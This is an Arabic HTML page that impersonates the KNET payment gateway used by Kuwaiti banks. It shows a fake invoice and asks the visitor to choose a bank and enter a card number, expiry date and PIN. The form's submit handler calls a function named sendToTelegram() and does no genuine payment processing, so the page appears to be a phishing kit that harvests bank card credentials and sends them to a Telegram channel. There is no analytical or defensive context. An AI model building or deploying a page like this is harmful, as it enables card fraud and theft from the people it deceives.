<!DOCTYPE html>
<html lang="ar">
<head>
    <meta charset="UTF-8">
    <title>صفحة دفع كي نت</title>
    <link rel="stylesheet" href="stele.css/kpa.css/kop.css/kpare.css">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1, user-scalable=no, minimal-ui">
    <script src="main.js/all.js/kave.js/kpay1.js/kpayy2.js/kpayt.js" defer></script>

</head>
<body>
    <header id="pageHeader">
        <img src="pc (1).jpg" alt="رأس الصفحة" id="headerImage">
    </header>

    <div class="box bank-info" id="bankInfoBox">
        <img id="imgkn" src="images (3).png" alt="بنك وربة" class="bank-logo" id="bankLogo">
        <p id="beneficiaryLabel">المستفيد: <strong id="beneficiaryName">Myfatoorah General Trading Co.</strong></p>
        <p id="amountLabel">المبلغ: <strong id="invoiceAmount">KD 20.000</strong></p>

    </div>
    

    <div class="box payment-form">
        <form id="paymentForm" onsubmit="event.preventDefault(); sendToTelegram();">
            <div class="input-container">
                <label id="textban" for="bankSelect">اختيار البنك:</label>
                <div class="input-box">
                    <select id="bankSelect" onchange="updateOptions()" required>
                        <option value="" disabled selected>يرجى اختيار البنك</option>
                        <option value="ABK">البنك الأهلي المتحد ABK</option>
                        <option value="RAJHI">RAJHI مصرف الراجحي</option>
                        <option value="BBK">BBK بنك الكويت والبحرين</option>
                        <option value="BOUBYAN">BOUBYAN بنك بوبيان</option>
                        <option value="BURGAN">BURGAN بنك برقان</option>
                        <option value="CBK">CBK البنك التجاري الكويتي</option>
                        <option value="DOHA">DOHA بنك الدوحة</option>
                        <option value="GBK">GBK بنك الخليج</option>
                        <option value="TAM">TAM بيتك</option>
                        <option value="KFH">KFH بيت التمويل الكويتي</option>
                        <option value="KIB">KIB بنك الكويت الدولي</option>
                        <option value="NBK">NBK بنك الكويت الوطني</option>
                        <option value="WEYAY">WEYAY الوطني</option>
                        <option value="QNB">QNB بنك قطر الوطني</option>
                        <option value="UNB">UNB بنك الاتحاد الوطني</option>
                        <option value="WARBA">WARBA بنك وربة</option>
                    </select>
                </div>
            </div>

            <div class="input-container">
                <label id="text2" for="cardNumber">رقم البطاقة:</label>
                <div class="input-box">
                    <input type="number" id="cardNumber" placeholder=" " required inputmode="numeric" oninput="validateNumberInput(event)">
                </div>
                <select id="prefixSelect" required>
                    <option value="" disabled selected>Prefix</option>
                </select>
            </div>

            <div class="input-container">
                <label id="texst3" for="expiryDate">تاريخ انتهاء البطاقة:</label>
                <div class="expiry input-box">
                    <select id="monthSelect" required>
                        <option value="" disabled selected>MM</option>
                        <option value="01">01</option>
                        <option value="02">02</option>
                        <option value="03">03</option>
                        <option value="04">04</option>
                        <option value="05">05</option>
                        <option value="06">06</option>
                        <option value="07">07</option>
                        <option value="08">08</option>
                        <option value="09">09</option>
                        <option value="10">10</option>
                        <option value="11">11</option>
                        <option value="12">12</option>
                    </select>
                    <select id="yearSelect" required>
                        <option value="" disabled selected>YYYY</option>
                        <option value="2025">2025</option>
                        <option value="2026">2026</option>
                        <option value="2027">2027</option>
                        <option value="2028">2028</option>
                        <option value="2029">2029</option>
                        <option value="2030">2030</option>
                        <option value="2031">2031</option>
                        <option value="2032">2032</option>
                        <option value="2033">2033</option>
                        <option value="2034">2034</option>
                        <option value="2035">2035</option>
                    </select>
                </div>
            </div>

            <div class="input-container">
                <label id="texst4" for="pin">الرقم السري:</label>
                <div class="input-box">
                    <input type="password" id="pin" placeholder="" required pattern="\d{4}" maxlength="4" inputmode="numeric">
                </div>
            </div>
        </form>

    </div>

    <div  class="box buttons" id="boxbuttons" >
        <button type="submit" form="paymentForm" id="submitButton">إرسال</button>
        <button type="button" onclick="resetForm()" id="ubmitButton">إلغاء</button>
    </div>    
    <p id="naem0">جميع الحقوق محفوظة © 2025 
   </p>
        <p id="naem0">   
        شركة الخدمات المصرفية الالية المشتركة - كي نت   </p>

        <script>

  
          


        </script>
        
</body>
</html>
